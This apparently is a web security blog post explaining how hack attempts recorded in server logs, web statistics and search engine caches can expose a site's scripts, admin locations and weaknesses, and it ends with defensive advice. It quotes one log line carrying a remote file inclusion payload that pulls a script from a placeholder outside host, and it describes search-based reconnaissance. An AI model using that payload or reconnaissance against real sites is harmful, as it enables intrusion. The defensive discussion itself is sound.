Following the "improve security" blog entry, here we are going to discuss the issues associated with the server log entries again. This time we will examine closer the purpose and possibilities of log entries that represent a hack attempt. Many of us see entries in the logs that are irrelevant with the site content assuming they are just attempts to compromise the content. Lets see an example of this:
210.109.103.221 - - [01/Nov/2008:04:43:11 -0500] "GET //errors.php?error=http://somedomain.com/somescript.txt .... The entry indicates a GET request with invalid arguments. The request may serve the attacker in many different ways. The obvious one is that if there is an errors.php script that accepts an "error" as a parameter without any filtering the txt script may be injected and executed over the site. What is not obvious though is that the GET request can be unique and used as an identifier of some sort. You may wonder what this means. An identifier can be used in conjunction with the search engines to locate other information about the site. Such information may include the location of the actual log file on the real server. An ISP or host may store this information in some place that is not properly protected. Search engines will parse every link they find and so if the logs folder or files are linked with one way or another their location will be revealed. Another reason is that attackers may submit or post such links/requests to various pages over the internet where they know they will be crawled by spiders. To better understand this you should check with search engines what results they bring up if you search for "/errors.php?error=http://"
At first glance, you may find amusing the finding of such a search but the results are critical. The GET request itself may include some known vulnerability for a web engine along with the identification string thus serving as a hack mechanism directly, while indirectly may give the login location of the site's server. Once the server logs are accessed by an outsider, the possibilities are limitless because the information exposed reveals various weaknesses. As you can now understand the search engines can be used as the propagation and communication means fo exploits to follow. What is more disturbing is that in many cases the site owner is unable to do anything about it, even if he knows and realises the problem. Because this information more than likely is controlled by the ISP, Host or an external entity the site owner gave in some way authorization for this. A site owner has the option to change hosts or remove the script from his site that is responsible for leaking internal information. It is imperative the host uses secure methods and should never expose such information outside. It is also possible the statistics or other kind of log information does not propagate outside the server by other means. There are all kinds of services around the web for site statistics. In many cases the information is exposed and it is done with the approval of the site owner. Unknown to him when in the past he deployed some sort for analysis jscript that transfer the information to another server to "improve the site's traffic". This information is now exposed and is accessible by anyone. Going back to the search engine results, one can now see first of all every single location of every script and any other resource that is in use by the web-site. So such information reveals pretty much everything among them: If there is an administration panel what scripts are used for access. Authorization can be extracted from the 401 header of course, If there is a webstats folder or other logs their location and scripts with the proper request. What forms the site uses by checking the POST requests. What are the accessible means for the headers. POST, GET, HEAD, PUT etc. which means an outsider knows exactly what script and parameters he has to use to upload something to the site. The IP that attempted to access certain scripts. For instance in association with the 401 header an outsider knows the IP origin of the administrator. The ways a server may have a problem by checking for 500 header. Certain requests can reveal it. That information can later used on DOS attempts. If they were already any successful uploads to the site the log or statistics will show it, therefore an outsider does not need to waste time doing any injection attempts. What is the size of the document each of the scripts sends back for the request. This could be used in a DOS as certain scripts can consume lots of bandwidth. Some of the logs may display just the 404s alone. But this information will also include the accidental 404s an attacker may seek and utilize. In most cases accidental 404s will come from the site's owner thus showing again the IP, script accessed etc. Possible propagation of parameters to subsequent scripts and cached by search engines, as it was described in our blog entry "filtering incoming parameters" The internal directory structure and the transports used for access like FTP, HTTP etc., along with the protocols used and accepted by the server.
Plus many more, just use your imagination. Our conclusion is that the 404 pages in particular can be exposed in various ways via web statistics, web logs, activity reports, external entities that handle traffic, search engines etc. Consequently their origin will be exposed, thus giving information about the server, administrator, scripts, resources and parameters. Some sites have specific modules to display the latest searches. As a result these injection attempts propagate due to lack of filtering within the site. For some strange reason these sites believe it is important to automatically update the content of pages by showing the last minute results. They expose their scripts to outsiders for no reason. Accessing the web statistics poses a threat as it can compromise the local system. On the one hand the site owner "trusts" the statistics tool (and/or whoever accesses the logs) and his browser may allow active content to run unfiltered. Many entries from the log may include jscripts and XSS methods in general to trigger the statistics script to run and hijack the browser or pc system. Our advice is that you should investigate whether or not your site exposes that kind of info and inform your host to take the necessary precautions. Also do not use jscripts or other types of active content that may reveal that kind of information outside your site. The server keeps all the information necessary to check for the relevant statistics. Keep in mind that no matter how expensive your SSL is, or whether you're on a dedicated, virtual or shared server the information exposed can compromise and consume all the resources you worked hard for to setup. Whether you changes the administration folder or got a certificate that your site is now PCI compliant and you can now process credit cards is also irrelevant unders such circumstances. If your customers knew that your server's information can be compromised in such ways they would never buy anything from your e-commerce store. |